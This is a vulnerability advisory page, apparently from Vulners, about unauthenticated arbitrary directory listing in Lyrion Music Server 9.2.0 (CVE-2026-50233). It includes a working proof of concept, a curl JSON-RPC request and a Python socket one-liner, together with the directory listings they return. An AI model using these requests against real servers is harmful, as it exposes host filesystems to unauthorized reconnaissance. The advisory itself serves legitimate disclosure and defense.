Lucene search
K

Lyrion Music Server 9.2.0 Arbitrary Directory Listing

🗓️ 05 Jun 2026 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 6 Views

Lyrion Music Server exposes readdir via CLI and HTTP without auth, enabling remote file system listing.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-50233
5 Jun 202613:24
attackerkb
CVE
CVE-2026-50233
5 Jun 202613:24
cve
Cvelist
CVE-2026-50233 Lyrion Music Server 9.2.0 Arbitrary Directory Listing
5 Jun 202613:24
cvelist
EUVD
EUVD-2026-34832
5 Jun 202613:24
euvd
NVD
CVE-2026-50233
5 Jun 202614:16
nvd
Packet Storm
📄 Lyrion Music Server 9.2.0 Arbitrary Directory Listing
5 Jun 202600:00
packetstorm
Positive Technologies
PT-2026-46952
5 Jun 202600:00
ptsecurity
<html><body><p>Lyrion Music Server 9.2.0 Arbitrary Directory Listing


Vendor: LMS Community
Product web page: https://www.lyrion.org
Affected version 9.2.0

Summary: Lyrion Music Server (formerly Logitech Media Server, and
often abbreviated as "LMS" ) is open-source software which can control
and serve (stream) music to a wide range of physical and virtual audio
players called Squeezeboxes. Lyrion Music Server can stream your local
music collection, internet radio stations, and content from many streaming
services (with and without subscriptions). The Command Line Interface
plugin allows Squeezebox software and the players to be controlled remotely
over a TCP/IP connection, for example by a third party automation system
like AMX or Crestron.

Desc: Lyrion Music Server exposes a readdirectory query through both its
CLI service (TCP port 9090) and its HTTP JSON-RPC endpoint (/jsonrpc.js)
that takes a folder parameter and lists its contents with no restriction
to the configured media directories and no authentication in the default
configuration. A remote attacker on the network can enumerate arbitrary
locations on the host filesystem.

Tested on: Windows 10 (64-bit) - EN
           Lyrion Music Server (9.2.0 - 1779973211)
           Perl/5.32.1
           SQLite


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5991
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5991
CVE ID: CVE-2026-50233
CVE URL: https://www.cve.org/CVERecord?id=CVE-2026-50233


27.05.2026

--


$ curl http://localhost:9000/jsonrpc.js \
&gt; -d "{\"id\":1,\"method\":\"slim.request\",\"params\":[\"\",[\"readdirectory\",\"0\",\"100\",\"folder:C:\\users\"]]}"

{"result":{"fsitems_loop":[{"path":"C:\\users\\.NET v4.5","isfolder":"1","name":".NET v4.5"},{"name":".NET v4.5 Classic","isfolder":"1","path":"C:\\users\\.NET v4.5 Classic"},{"name":"DefaultAppPool","isfolder":"1","path":"C:\\users\\DefaultAppPool"},{"isfolder":"1","name":"defaultuser0","path":"C:\\users\\defaultuser0"},{"path":"C:\\users\\testuser","isfolder":"1","name":"testuser"},{"isfolder":"1","name":"Public","path":"C:\\users\\Public"}],"count":6},"id":1,"method":"slim.request","params":["",["readdirectory","0","100","folder:C:\\users"]]}


$ python -c "import socket,urllib.parse,pprint; s=socket.socket(); s.connect(('127.0.0.1',9090)); s.sendall(b'readdirectory 0 100 folder:C:\r\\n'); raw=s.recv(65535).decode(); s.close(); txt=urllib.parse.unquote(raw); parts=txt.split(); items=[]; cur={}; [ (items.append(cur) or (cur:={})) if k=='path' and cur else cur.update({k:v}) for k,v in (p.split(':',1) for p in parts if ':' in p) ]; items.append(cur); pprint.pprint(items)"
[{'count': '14', 'folder': 'C:'},
 {'isfolder': '1', 'name': 'BIOS'},
 {'isfolder': '1', 'name': 'drivers'},
 {'isfolder': '1', 'name': 'Intel'},
 {'isfolder': '1', 'name': 'jython2.7.0'},
 {'isfolder': '1', 'name': 'OpenSSL-Win32'},
 {'isfolder': '1', 'name': 'PaintToolSAI'},
 {'isfolder': '1', 'name': 'Program'},
 {'isfolder': '1', 'name': 'Program'},
 {'isfolder': '1', 'name': 'Temp'},
 {'isfolder': '1', 'name': 'Users'},
 {'isfolder': '1', 'name': 'Windows'},
 {'isfolder': '1', 'name': 'xampp'},
 {'isfolder': '', 'name': 'test.txt'},
 {'isfolder': '', 'name': 'NTUSER.dat'}]
</p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jun 2026 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.15.3
CVSS 46.9
6